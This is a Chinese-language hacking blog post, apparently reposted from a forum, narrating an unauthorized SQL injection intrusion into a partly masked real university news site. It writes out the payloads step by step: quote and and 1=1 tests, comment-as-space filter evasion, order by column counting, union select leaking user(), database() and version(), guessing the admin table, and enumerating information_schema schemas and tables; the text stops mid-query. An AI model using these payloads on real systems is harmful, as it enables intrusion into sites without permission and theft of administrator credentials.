【渗透过程】...检测南方某大学

it2022-05-07  0

在谷歌搜索了php的站,开始找目标,无意之间看到一个大学的,****外贸大学。打开后,找了个新闻页面, 找了几个以php?id=**

的页面都米有找到,呵呵呵,现在还米有太顺手的工具,麻烦啊!http://www.*****.edu.cn/****/*******/showarticle.php?id=**

呵呵!人品还不错啊!找了几个后碰到了一个,随手扔了个单引号,出现了不正常的页面,).[attach]360[/attach]   看来有戏啊!and 1=1正常, (这里我直接用的/**/代替空格,有的过略了空格再回过来头改变麻烦,我之间用/**/)那么再来看看and 1=2,返回不正常了,  于是

我信心来了开始搞。开始猜下字段数目,order by 5正常 ,那么我再加点 order by 10,返回不正常出错了!那就说明在5-10之间

,从5开始一个一个的加,最后确定是8!   那么我们继续,我们就看下权限 和数据库都是什么,提交http://www.*****.edu.cn/*****/*****/showarticle.php?

id=**/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7,8/*   出现了2,4,5,6,7,8几个数字! 这时候我们可以替换来

查看信息! 我分别替换上user()  database()   version()  system_user() , 这几个代表着:    “用户名”   “数据库名” “数据库版

本” “统用户名” 的意思!我们可以看出这个不是root权限,所以我们老老实实的猜解吧!   [img]http://www.t00ls.net/attachments/month_0811 /20081129_646b4f03a4e0f7c46480LHKOrXHog3pM.jpg[/img][url=http: //www.t00ls.net /attachment.php?aid=MzYxfDMyNTk4NjkwfDEyODY0ODUzOTB8MWNiY3hHMHNnTjNEZzhUR3dmODNjaXNiQ3AwRjNtTllZeWFVdUozMWpNNy9uS0k=& amp;nothumb=yes]链接标记下载[/url] (71.33 KB)

2008-11-29 07:05

   猜解开始,我们来判断表名,我首先提交了http://www.*****.edu.cn/*****/*****/showarticle.php?

id=**/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7,8/**/from/**/admin/*      结果返回不正常,运气米有那么好,不

可能一步成功的!administratosr 不行,system_user也不行,这个我们需要按照经验,它是学校的所以根本不可能用那些企业的

manager  boss等等,最后判断出来是user。!这时候我高高兴兴的去猜解字段,为什么我高兴呢!因为眼尖的朋友可以看到,下面

就有后台,现在只要字段出来,我们就完工了!嘎嘎!       理想是美好的,现实是残酷的!直接打开后台,查看源代码,猜测得出字段为username   pwd  我回到前面继续,分别在2和7的位

置替换上这两个!但是出乎我的意料的是,返回不正常,也就说我猜测错误!这下可急死我了!怎么办呢?一时之间莫不着头绪!此

时已经晚上3点多了!睡觉去!明天再说 !   [img]http://www.t00ls.net/attachments/month_0811 /20081129_106819dd979a998e1cb56DGRNHfS65Ws.jpg[/img][url=http: //www.t00ls.net /attachment.php?aid=MzYyfDM0YjEyMmNhfDEyODY0ODUzOTB8MWNiY3hHMHNnTjNEZzhUR3dmODNjaXNiQ3AwRjNtTllZeWFVdUozMWpNNy9uS0k=& amp;nothumb=yes]链接标记下载[/url] (66.79 KB)

2008-11-29 07:05  [img]http://www.t00ls.net/attachments/month_0811 /20081129_9850d2941251af27a5f9kiBbGQW5fwXY.jpg[/img][url=http: //www.t00ls.net /attachment.php?aid=MzYzfGFlMThlN2JmfDEyODY0ODUzOTB8MWNiY3hHMHNnTjNEZzhUR3dmODNjaXNiQ3AwRjNtTllZeWFVdUozMWpNNy9uS0k=& amp;nothumb=yes]链接标记下载[/url] (108.98 KB)

2008-11-29 07:05

  山穷水尽疑无路,柳暗花明又一村!第二天,晚上我又在这里徘徊,不停的找有用的信息!突然我看到了一丝曙光!那就是数据库

版本  5.0.18-nt!记得前两天我疯狂的找php的资料时候,看过一篇文章关于Mysql5注射的,里面介绍到我们只要通过注射点构造查

询语句遍相关字段,就可以得到我们想要的信息了!还好幸亏自己有点印象不然自己只能放弃了!

再回到开始,首先我们可以通过不断递增limit的第一个参数查询到所有的数据库名,语句为 http://www.*****.edu.cn/*****/*****/showarticle.php?

id=**/**/and/**/1=2/**/union/**/select/**/1,SCHEMA_NAME,3,4,5,6,7,8/**/from/**/information_schema.SCHEMATA/**/limit/

**/1,2/*    看到我们想看到的信息!找到敏感的数据名,我们把它转换为十六进制编码的,secure转换为16进制为0x 736563757265!  [img]http://www.t00ls.net/attachments/month_0811 /20081129_ebf8d8411ebdc258110dcto099kZINWu.jpg[/img][url=http: //www.t00ls.net /attachment.php?aid=MzY0fDNjMTFhMzcxfDEyODY0ODUzOTB8MWNiY3hHMHNnTjNEZzhUR3dmODNjaXNiQ3AwRjNtTllZeWFVdUozMWpNNy9uS0k=& amp;nothumb=yes]链接标记下载[/url] (59.55 KB)

2008-11-29 07:05

接着第一步,我们把所有的表都列出来,[url=http://www.*****.edu.cn/*****/***** /showarticle.php]链接标记http://www.*****.edu.cn/*****/***** /showarticle.php[/url]? id=**/**/and/**/1=2/**/union/**/select/**/1,TABLE_NAME,3,4,5,6,7,8/**/from/**/information_schema.TABLES/**/where/**/

转载于:https://www.cnblogs.com/amwld/archive/2011/06/01/2065634.html


最新回复(0)